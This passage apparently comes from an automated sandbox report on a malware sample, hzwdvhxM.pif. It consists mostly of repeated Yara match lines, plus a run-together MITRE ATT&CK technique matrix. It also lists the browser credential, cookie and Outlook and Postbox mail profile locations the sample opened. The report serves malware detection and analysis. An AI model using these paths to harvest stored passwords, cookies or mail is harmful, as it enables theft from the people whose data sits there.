        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2a601216.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2a6002f6.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.3.hzwdvhxM.pif.28abccf0.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.25c20f20.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.3.hzwdvhxM.pif.2792f7f8.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.2bdf0000.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.hzwdvhxM.pif.23e4cb50.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.29421216.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.2c440000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2cee0000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.29421216.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.hzwdvhxM.pif.23e4cb50.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2a6002f6.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.25c20f20.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.259d02f6.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2d540000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.259d02f6.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2cee0f20.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.2bdf0000.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.294202f6.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2cee0f20.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2cee0000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.3931012039.000000002A9A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.3928176067.0000000025D2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.3928012467.00000000297DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: hzwdvhxM.pif PID: 7632, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: hzwdvhxM.pif PID: 8004, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: hzwdvhxM.pif PID: 8172, type: MEMORYSTR
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.25c20000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.294202f6.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.287d0000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2d540000.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2a601216.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.2c440000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.25c20000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.259d1216.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.2bdf0f20.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.3.hzwdvhxM.pif.28abccf0.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.287d0000.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2a601216.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2a6002f6.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.3.hzwdvhxM.pif.28abccf0.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.25c20f20.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.3.hzwdvhxM.pif.2792f7f8.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.2bdf0000.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.hzwdvhxM.pif.23e4cb50.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.29421216.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.2c440000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2cee0000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.29421216.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.hzwdvhxM.pif.23e4cb50.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2a6002f6.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.25c20f20.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.259d02f6.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.2bdf0000.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2d540000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.259d02f6.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2cee0f20.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2cee0f20.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.294202f6.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2cee0000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.3931012039.000000002A9A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.3930369501.0000000026D03000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.3928176067.0000000025D2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.3934166321.000000002B943000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.3928012467.00000000297DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.3930482210.000000002A793000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: hzwdvhxM.pif PID: 7632, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: hzwdvhxM.pif PID: 8004, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: hzwdvhxM.pif PID: 8172, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 0000000E.00000002.3931012039.000000002A8C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.3928012467.0000000029711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.3928176067.0000000025C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.25c20000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.294202f6.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.287d0000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2d540000.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2a601216.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.2c440000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.25c20000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.259d1216.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.2bdf0f20.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.3.hzwdvhxM.pif.28abccf0.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.287d0000.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2a601216.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2a6002f6.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.3.hzwdvhxM.pif.28abccf0.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.25c20f20.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.3.hzwdvhxM.pif.2792f7f8.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.2bdf0000.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.hzwdvhxM.pif.23e4cb50.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.29421216.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.2c440000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2cee0000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.29421216.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.hzwdvhxM.pif.23e4cb50.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2a6002f6.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.25c20f20.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.259d02f6.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2d540000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.259d02f6.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2cee0f20.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.2bdf0000.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.294202f6.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2cee0f20.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2cee0000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.3928012467.00000000297DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: hzwdvhxM.pif PID: 7632, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: hzwdvhxM.pif PID: 8004, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: hzwdvhxM.pif PID: 8172, type: MEMORYSTR
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.25c20000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.294202f6.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.287d0000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2d540000.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2a601216.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.2c440000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.25c20000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.259d1216.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.2bdf0f20.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.3.hzwdvhxM.pif.28abccf0.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.287d0000.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2a601216.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2a6002f6.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.3.hzwdvhxM.pif.28abccf0.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.25c20f20.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.3.hzwdvhxM.pif.2792f7f8.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.2bdf0000.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.hzwdvhxM.pif.23e4cb50.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.29421216.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.2c440000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2cee0000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.29421216.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.hzwdvhxM.pif.23e4cb50.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2a6002f6.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.25c20f20.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.259d02f6.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2d540000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.hzwdvhxM.pif.259d02f6.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2cee0f20.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.2bdf0000.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.294202f6.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2cee0f20.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.hzwdvhxM.pif.2cee0000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.3931012039.000000002A9A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.3928176067.0000000025D2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.3928012467.00000000297DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: hzwdvhxM.pif PID: 7632, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: hzwdvhxM.pif PID: 8004, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: hzwdvhxM.pif PID: 8172, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire Infrastructure1
        Valid Accounts
        1
        Native API
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        1
        Disable or Modify Tools
        1
        OS Credential Dumping
        1
        System Time Discovery
        Remote Services11
        Archive Collected Data
        1
        Web Service
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        Shared Modules
        1
        Valid Accounts
        1
        Valid Accounts
        11
        Deobfuscate/Decode Files or Information
        LSASS Memory1
        File and Directory Discovery
        Remote Desktop Protocol1
        Data from Local System
        3
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts2
        Command and Scripting Interpreter
        1
        Registry Run Keys / Startup Folder
        1
        Access Token Manipulation
        31
        Obfuscated Files or Information
        Security Account Manager26
        System Information Discovery
        SMB/Windows Admin Shares1
        Email Collection
        21
        Encrypted Channel
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook312
        Process Injection
        3
        Software Packing
        NTDS1
        Query Registry
        Distributed Component Object Model1
        Clipboard Data
        3
        Non-Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
        Registry Run Keys / Startup Folder
        1
        Timestomp
        LSA Secrets341
        Security Software Discovery
        SSHKeylogging14
        Application Layer Protocol
        Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading
        Cached Domain Credentials51
        Virtualization/Sandbox Evasion
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        File Deletion
        DCSync3
        Process Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job231
        Masquerading
        Proc Filesystem1
        Application Window Discovery
        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        Valid Accounts
        /etc/passwd and /etc/shadow1
        System Network Configuration Discovery
        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
        Access Token Manipulation
        Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd51
        Virtualization/Sandbox Evasion
        Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
        Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task312
        Process Injection
        KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
